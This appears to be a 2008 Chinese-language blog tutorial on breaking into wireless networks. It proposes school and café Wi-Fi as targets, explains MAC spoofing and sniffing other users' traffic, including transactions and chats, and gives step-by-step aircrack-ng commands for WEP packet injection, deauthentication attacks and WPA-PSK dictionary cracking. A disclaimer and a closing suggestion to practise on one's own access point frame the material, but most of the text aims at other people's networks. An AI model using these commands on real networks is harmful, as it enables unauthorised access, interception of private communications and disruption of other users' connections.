開始實戰!
實戰有大致上分成四個步驟:
尋找目標
進行連線
搜集資訊
破解加密
實作的環境可以選擇在學校的無線網路或者是有開放網路的咖啡廳。當然我們必須再次強調,這只是教育技術研討用,並不鼓勵用來進行非法用途。如有發生不正當的行為,使用者必須自行承擔責任。
在尋找攻擊目標之前,必須先將手邊的工具準備齊全。例如掃瞄工具、封包擷取分析工具、更改 MAC Address、破解攻擊程式等。
工具的平台大多數為 Linux 上的工具,由此配合 Live CD 是個還不錯的方式。至於大家常用的 Windows 上也有不少工具,以下有列出的工具大家可以自行去網路上搜尋。
* 尋找目標
無線 AP 那麼多,我們要如何選擇肥羊呢?依照我們在課堂上所講過的以及人類的天性:最偷懶的設定就是最肥的肥羊!怎麼說?
首先先打開內建的無線網路工具,在外面的無線訊號中,一定會有完全沒有經過設定的基地台。例如最常見的「default」、「Wireless」等。只要連接上,就可以直接享用裡面的資源。
當然內建的工具多半不完備,在 Windows 下我推薦使用 NetStumbler。
NetStumbler 是個很不錯的免費掃瞄工具。(礙於篇幅只做簡單的介紹。)NetStumbler 可以掃瞄出 AP 的 MAC、SSID、頻道、訊號強度等資訊。可以讓攻擊者選擇易於攻擊的目標。
除了 NetStumbler 之外,大家很愛用的 Cain & Abel 在新版中也有提供簡單的 Wireless 掃瞄及攻擊。也可以配合 AirPcap Driver 及特殊的硬體做攻擊。有興趣的人可以上網購買,據說有出乎意料的效果。
在 Linux 下則是可以使用著名的 Kismet、Airodump 等工具。用法相同就請各位自行研究。
在使用工具進行掃瞄時可搭配功率較強的無線網卡,所獲得的資訊會更為齊全。在掃瞄時,由於部分 AP 有隱藏 SSID 防護掃瞄的功能(關閉 SSID Beacon 廣播),一些掃瞄工具會加入常見預設 SSID 來掃瞄,以增加成果。如果是手動掃瞄也可以自行增加 default 之類的預設 SSID。
* 進行連線
連線就不用多說了吧?點兩下!
不過在此要注意的是,您只能連線到未加密的開放式網路,或者是已知金鑰的加密網路。
在一般沒有防護且有開啟 DHCP 服務的 AP,可以直接進行連線正常使用網路。但如果未開放 DHCP 的網路,就必須要使用監聽程式或者前面所使用掃瞄工具找到的 IP 資訊來自行做設定。至於有防護鎖定 MAC Address 的網路,就必須要自行更改無線網卡的 MAC Address 為其他已成功連線的網卡。更改 MAC Address 的方法可以自行上網查詢。
* 搜集資訊
成功連上網路之後當然就是要挖寶啦!網路監聽的原理在此就不詳述。只要是任何未加密的網路封包,都會有被監聽攔截的危險。例如瀏覽網站、進行交易、BBS、MSN 聊天等。
而要進行監聽,您的網卡必須要支援開啟雜湊模式 (Promiscuous Mode),擷取不是屬於自己的封包。常用的監聽工具有 Wireshark、Cain & Abel、sniffit 等。使用方法都非常類似,所以在此也不詳述。
* 破解加密
如果連線的 AP 有進行加密怎麼辦?當然就是進行爆破啦!
一般最常見的無線網路加密有兩種:WEP、WPA。以下簡單介紹如何爆破這兩種加密方法。
WEP 是一開始無線網路很常見的加密法。但由於安全性不足,因此出現相應的破解工具。例如 WEPCrack、AirSnort、AirCrack 等。
在這邊介紹較為快速的 Linux 下的 AirCrack。
(參考頁面:
http://www.wirelessdefence.org/Contents/AircrackMain.htm )
目前 AirCrack 已有新版本 AirCrack-ng
http://aircrack-ng.org/
工具的名稱皆在後面加上「-ng」,並且也有提供 Windows 版本供使用。
AirCrack-ng 內含五組主要工具:
airmon-ng 網卡監聽工具
airodump-ng 封包擷取工具
aireplay-ng 封包注入工具
aircrack-ng 封包破解工具
airdecap-ng 封包解密工具
不同晶片啟動網卡的過程會略有差異,請使用者自行注意。
AirCrack 特別的是利用封包注入的方式,取得更多封包加速破解。製造大量 ARP Request 迫使 AP 進行回應,以便收集大量加密封包取得 IV 值(Initial Vector),反推回 WEP Key。
WEP Key Cracking
WEP 破解的簡單流程如下:
開啟網卡監聽 > 擷取封包 > 惡意注入封包 > 破解 WEP Key
* 啟動監聽
airmon-ng start
ex: airmon-ng start wlan0 1
先執行 airmon-ng 查看網卡的名稱,再下指令開啟監聽。如成功開啟會顯示「monitor mode enabled」。
此例為監聽第一個頻道。
* 擷取封包
airodump-ng -w -c
ex: airodump-ng -w dump -c 1 wlan0
將擷取到的封包存至檔案 dump 中。
* 注入封包
aireplay-ng [options]
ex: aireplay-ng -3 -b [AP MAC] -h [your MAC] -x [packet number] wlan0
參數 -3 強制發出大量 ARP Request 封包,讓 AP 回應加密的 ARP Reply 封包供我們收集 IV 值。
或者參數 -0 強制使用 de-auth 攻擊讓連線上 AP 的其他使用者斷線重新進行認證。
ex: aireplay-ng -0 5 -a 00:01:02:03:04:05 -c 00:04:05:06:07:08 wlan0
* 破解 Key
aircrack-ng -x -f 4 [filename]
ex: aircrack-ng -x -f 4 dump*.cap
將收集到的封包進行破解。參數 -x -f 會自動暴力猜測後兩個位元的 key,以便加快速度。
WPA Pre-Shared Key Cracking
WPA 雖然改進了 WEP 設計上的缺陷,改以 four-way handshake 的方式進行認證,但是其認證的過程是使用未加密的明文,可以被擷取下來進行破解。以下一樣使用 AirCrack 來簡單說明。
WPA 破解的流程如下:
開啟網卡監聽 > 擷取封包 > 惡意注入 de-authentication 封包 > 破解 WPA Key
步驟跟前面類似,以下就簡單列出示範的指令:
* 擷取封包
airodump-ng -c 9 --bssid [ssid] -w dump wlan0
[-c 9] 頻道 9
[--bssid] AP 的 SSID
[-w] 寫入檔案 dump
* 注入封包
aireplay-ng -0 1 -a [MAC] -c [MAC] wlan0
[-0 1] 注入 de-auth 封包 1 枚
[-a] AP MAC Address
[-c] 要攻擊的 client MAC Address
* 破解 WPA PSK
aircrack-ng -w password.lst -b [MAC] dump*.cap
[-w] 密碼字典檔,以字典檔攻擊加快效率。
[-b] 要攻擊的 AP MAC Address
這次簡單的攻擊就大致上講到這邊!:D
請各位「拿自己的 AP 來做練習」,以免觸法!
03/24/2008 - 16:52 @ Nisra